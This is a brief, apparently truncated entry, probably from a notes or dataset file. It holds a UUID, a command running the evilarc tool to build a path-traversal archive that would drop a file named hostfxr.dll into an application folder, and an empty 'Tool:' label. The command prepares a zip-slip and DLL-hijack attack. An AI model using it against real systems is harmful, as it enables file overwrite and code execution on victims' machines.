3c6859ce-230b-484d-be6c-9320c0202408 - Alternative: python2.7 evilarc.py -p ../app hostfxr.dll -d 0
Tool:
